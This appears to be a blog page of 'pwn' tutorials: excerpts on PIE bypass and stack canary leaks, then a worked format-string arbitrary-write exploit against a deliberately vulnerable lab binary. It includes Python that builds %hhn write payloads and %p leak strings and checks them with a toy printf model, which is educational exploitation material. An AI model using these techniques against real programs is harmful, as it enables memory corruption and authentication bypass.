Articles tagged pwn

PIE bypass

pie PIE (Position Independent Executable) is an executable format whose code is linked so that it can run correctly at any base address; it is commonly used to harden a program's address space. With PIE the code loaded into memory is not mapped at a fixed address: the loader picks the base at each load (randomised under ASLR), which makes it much harder for an attacker to predict where the code and data will end up. Examples of code relocation are: load-time (load-ti……


Stack canary leak methods

What are canary security cookies? Assume that at the beginning of a function call (e.g. during its prologue) we save a value in the function's stack frame; we would then expect (if everything went well!) to read the same value just before the function exits, namely in its epilogue. If the value has changed, execution of the program is terminated and an error message is displayed. [1] Obviously, this protection mechanism is added by the compiler during compilation. For the GNU Compiler Collection (gcc), it is implemented via the StackGuard extension, which was added to gcc 2.7.2.2. [1] Bypass stack canary: vulnerable progr……


Format string vulnerability: arbitrary write

vuln.c

    #include <stdio.h>

    int auth = 0;

    int main() {
        char password[100];
        puts("Password: ");
        fgets(password, sizeof password, stdin);
        printf(password);            /* user input used as the format string: the bug */
        printf("Auth is %i\n", auth);
        if (auth == 10) {
            puts("Authenticated!");
        }
    }

Program analysis

Binary protections

    gcc -m32 -no-pie -fno-stack-protector -z execstack vuln.c -o vuln
    $ checksec --file=./vuln
    [*] '/home/kali/exploits/str_arb_write/vuln'
        Arch:     i386-32-little
        RELRO:    Partial RELRO
        Stack:    No canary found
        NX:       NX disabled
        PIE:      No PIE (0x8048000)
        RWX:      Has RWX segments

Stack layout

    $ ./vuln
    Password:
    %p %p %p %p %p %p %p %p %p %p %p
    0x64 0xf7e1d620 0x804918d 0xf7ffdbac 0x1 0xf7fc17c0 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070
    Auth is 0

ASCII to hex: `%` is 0x25, space is 0x20, `p` is 0x70. Read little-endian, 0x25207025 is the byte sequence 25 70 20 25, i.e. "%p %": the 7th dword printed is the start of our input buffer, so the format string itself is printf argument 7.

3. Building the exploit stack

Stack offset | Stack contents ……
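As an added example (not code from the original article), the step the analysis above leads to: turning the observed buffer offset into an arbitrary write. The builder emits four `%hhn` byte writes, and a toy model of printf's vararg handling checks that the resulting payload really stores the wanted value. The stack snapshot reuses the six dwords the `%p` probe printed above; the address of `auth` (0x804c028) is an assumption for illustration and must be replaced with the real one (e.g. from `nm ./vuln`); the printf model is a constructed simulation of glibc's behaviour, not glibc itself. The `%K$p` read helper is the same direct-parameter-access primitive that a format-string stack canary leak (the subject of the article above) relies on.

```python
import re
import struct

# Constructed model of the vuln stack: the six dwords the `%p` probe on the page
# printed ahead of the buffer (printf arguments 1..6); the input buffer itself
# starts at printf argument 7.
LEADING_ARGS = [0x64, 0xf7e1d620, 0x804918d, 0xf7ffdbac, 0x1, 0xf7fc17c0]
AUTH_ADDR = 0x804c028  # ASSUMED address of `auth`; take the real one from `nm ./vuln`

# %p, %Nc, %K$p, %K$n / %K$hn / %K$hhn are all the toy printf understands.
SPEC = re.compile(r"%(?:(\d+)\$)?(\d*)(hh|h)?([cpn])")


def build_stack(payload, leading=LEADING_ARGS):
    """Vararg area as a list of dwords: the fixed values, then the payload itself."""
    buf = payload + b"\x00" * (-len(payload) % 4)
    return list(leading) + [struct.unpack_from("<I", buf, i)[0] for i in range(0, len(buf), 4)]


def probe_offset(probe=b"%p " * 11):
    """1-based printf argument index at which our buffer appears (the page's '7th dword')."""
    marker = struct.unpack_from("<I", probe)[0]  # first 4 bytes of the probe, little-endian
    return build_stack(probe).index(marker) + 1


def fmt_read(index):
    """Direct-parameter-access read of one stack dword; a canary leak uses exactly this."""
    return f"%{index}$p".encode()


def fmt_write_dword(addr, value, offset):
    """Write the 32-bit `value` to `addr` with four %hhn stores.

    `offset` is the argument index of the first dword of our buffer. %hhn stores
    the low byte of the running output count, so before each store we pad with
    %Nc until that low byte equals the byte we want at addr+i.
    """
    addrs = b"".join(struct.pack("<I", addr + i) for i in range(4))
    payload = bytearray(addrs)
    count = len(addrs)  # printf has already emitted the raw address bytes
    for i in range(4):
        want = (value >> (8 * i)) & 0xff
        pad = (want - count) % 256
        if pad:
            payload += f"%{pad}c".encode()
            count += pad
        payload += f"%{offset + i}$hhn".encode()
    return bytes(payload)


def simulate_printf(fmt, stack, mem):
    """Toy printf over `stack`: returns the rendered output; %n-family stores land in
    `mem` (address -> byte). Simulation only, not glibc's real algorithm."""
    text = fmt.decode("latin-1")  # 1:1 with bytes, so len(out) counts bytes
    out, pos, next_arg = "", 0, 1
    for m in SPEC.finditer(text):
        out += text[pos:m.start()]  # literal text (including the raw address bytes)
        pos = m.end()
        idx, width, length, conv = m.groups()
        arg_i = int(idx) if idx else next_arg
        if not idx:
            next_arg += 1
        val = stack[arg_i - 1]
        if conv == "c":
            out += chr(val & 0xff).rjust(int(width or 1))
        elif conv == "p":
            out += f"{val:#x}"
        else:  # %n / %hn / %hhn: store the number of bytes written so far
            size = {"hh": 1, "h": 2, None: 4}[length]
            for i in range(size):
                mem[val + i] = (len(out) >> (8 * i)) & 0xff
    return out + text[pos:]


def read_dword(mem, addr):
    return sum(mem.get(addr + i, 0) << (8 * i) for i in range(4))


def exploit_auth(addr=AUTH_ADDR, value=10):
    """Build the `auth = 10` payload and confirm it in the toy printf."""
    payload = fmt_write_dword(addr, value, probe_offset())
    assert len(payload) < 100  # must fit fgets(password, 100, stdin)
    mem = {}
    simulate_printf(payload, build_stack(payload), mem)
    return payload, read_dword(mem, addr)


if __name__ == "__main__":
    payload, written = exploit_auth()
    print(payload, hex(written))
```

Against the real binary the payload is fed to the `Password:` prompt unchanged; the address bytes go first so they are dword-aligned at argument 7, and the `%Nc` padding keeps the total under fgets's 100-byte limit. Note that an address containing 0x00, 0x0a or 0x25 breaks this layout (fgets stops at the newline, printf at the NUL, and 0x25 is a stray `%`), which is why the four target addresses should be checked before use.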
